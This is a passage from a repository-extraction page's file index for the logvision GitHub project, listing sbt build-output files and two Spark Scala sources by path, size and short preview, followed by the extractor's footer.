"chars": 0,
"preview": ""
},
{
"path": "spark/project/target/streams/_global/update/_global/streams/out",
"chars": 355,
"preview": "\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0m\"not up to date. inChanged = true, force = false\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mUpd"
},
{
"path": "spark/project/target/streams/compile/_global/_global/compileBinaryFileInputs/previous",
"chars": 15768,
"preview": "[\"sbt.Task[scala.collection.immutable.Map[java.lang.String, scala.collection.Seq[scala.Tuple2[java.nio.file.Path, sbt.ni"
},
{
"path": "spark/project/target/streams/compile/_global/_global/compileOutputs/previous",
"chars": 179,
"preview": "[\"sbt.Task[scala.collection.Seq[java.nio.file.Path]]\",[\"/Users/xander/Desktop/logvision/spark/project/target/streams/com"
},
{
"path": "spark/project/target/streams/compile/_global/_global/compileSourceFileInputs/previous",
"chars": 186,
"preview": "[\"sbt.Task[scala.collection.immutable.Map[java.lang.String, scala.collection.Seq[scala.Tuple2[java.nio.file.Path, sbt.ni"
},
{
"path": "spark/project/target/streams/compile/_global/_global/dependencyClasspathFiles/previous",
"chars": 14042,
"preview": "[\"sbt.Task[scala.collection.Seq[java.nio.file.Path]]\",[\"/Users/xander/.sbt/1.0/plugins/target/scala-2.12/sbt-1.0/classes"
},
{
"path": "spark/project/target/streams/compile/_global/_global/discoveredMainClasses/data",
"chars": 2,
"preview": "[]"
},
{
"path": "spark/project/target/streams/compile/_global/_global/managedSourcePaths/previous",
"chars": 57,
"preview": "[\"sbt.Task[scala.collection.Seq[java.nio.file.Path]]\",[]]"
},
{
"path": "spark/project/target/streams/compile/compile/_global/streams/out",
"chars": 0,
"preview": ""
},
{
"path": "spark/project/target/streams/compile/compileIncremental/_global/streams/export",
"chars": 0,
"preview": ""
},
{
"path": "spark/project/target/streams/compile/compileIncremental/_global/streams/out",
"chars": 59,
"preview": "[debug] Full compilation, no sources in previous analysis.\n"
},
{
"path": "spark/project/target/streams/compile/copyResources/_global/streams/copy-resources",
"chars": 12,
"preview": "[[{},{}],{}]"
},
{
"path": "spark/project/target/streams/compile/copyResources/_global/streams/out",
"chars": 43,
"preview": "[debug] Copy resource mappings: \n[debug] \t\n"
},
{
"path": "spark/project/target/streams/compile/dependencyClasspath/_global/streams/export",
"chars": 13776,
"preview": "/Users/xander/.sbt/1.0/plugins/target/scala-2.12/sbt-1.0/classes:/Users/xander/Library/Caches/Coursier/v1/https/repo1.ma"
},
{
"path": "spark/project/target/streams/compile/exportedProducts/_global/streams/export",
"chars": 80,
"preview": "/Users/xander/Desktop/logvision/spark/project/target/scala-2.12/sbt-1.0/classes\n"
},
{
"path": "spark/project/target/streams/compile/externalDependencyClasspath/_global/streams/export",
"chars": 13711,
"preview": "/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1."
},
{
"path": "spark/project/target/streams/compile/internalDependencyClasspath/_global/streams/export",
"chars": 1,
"preview": "\n"
},
{
"path": "spark/project/target/streams/compile/managedClasspath/_global/streams/export",
"chars": 13711,
"preview": "/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1."
},
{
"path": "spark/project/target/streams/compile/unmanagedClasspath/_global/streams/export",
"chars": 1,
"preview": "\n"
},
{
"path": "spark/project/target/streams/compile/unmanagedJars/_global/streams/export",
"chars": 1,
"preview": "\n"
},
{
"path": "spark/project/target/streams/runtime/dependencyClasspath/_global/streams/export",
"chars": 2991,
"preview": "/Users/xander/Desktop/logvision/spark/project/target/scala-2.12/sbt-1.0/classes:/Users/xander/.sbt/1.0/plugins/target/sc"
},
{
"path": "spark/project/target/streams/runtime/exportedProducts/_global/streams/export",
"chars": 80,
"preview": "/Users/xander/Desktop/logvision/spark/project/target/scala-2.12/sbt-1.0/classes\n"
},
{
"path": "spark/project/target/streams/runtime/externalDependencyClasspath/_global/streams/export",
"chars": 2846,
"preview": "/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3"
},
{
"path": "spark/project/target/streams/runtime/fullClasspath/_global/streams/export",
"chars": 2991,
"preview": "/Users/xander/Desktop/logvision/spark/project/target/scala-2.12/sbt-1.0/classes:/Users/xander/.sbt/1.0/plugins/target/sc"
},
{
"path": "spark/project/target/streams/runtime/internalDependencyClasspath/_global/streams/export",
"chars": 80,
"preview": "/Users/xander/Desktop/logvision/spark/project/target/scala-2.12/sbt-1.0/classes\n"
},
{
"path": "spark/project/target/streams/runtime/managedClasspath/_global/streams/export",
"chars": 2846,
"preview": "/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3"
},
{
"path": "spark/project/target/streams/runtime/unmanagedClasspath/_global/streams/export",
"chars": 1,
"preview": "\n"
},
{
"path": "spark/project/target/streams/runtime/unmanagedJars/_global/streams/export",
"chars": 1,
"preview": "\n"
},
{
"path": "spark/src/main/scala/learning.scala",
"chars": 4669,
"preview": "import java.nio.channels.Pipe\n\nimport org.apache.spark.ml.{Pipeline, PipelineModel}\nimport org.apache.spark.ml.classific"
},
{
"path": "spark/src/main/scala/streaming.scala",
"chars": 9665,
"preview": "import java.text.SimpleDateFormat\nimport java.util.concurrent.Future\nimport java.util.{Locale, Properties}\n\nimport com.r"
},
{
"path": "spark/target/streams/_global/_global/checkBuildSources/_global/inputFileStamps/previous",
"chars": 324,
"preview": "[\"sbt.Task[scala.collection.Seq[scala.Tuple2[java.nio.file.Path, sbt.nio.FileStamp]]]\",{\"hashes\":[[\"/Users/xander/Deskto"
},
{
"path": "spark/target/streams/_global/_global/checkBuildSources/_global/streams/out",
"chars": 47,
"preview": "[debug] Checking for meta build source updates\n"
}
]
// ... and 2 more files (download for full content)
About this extraction
This page contains the full source code of the xander-wang/logvision GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 75 files (70.1 MB), approximately 1.8M tokens, and a symbol index with 1409 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.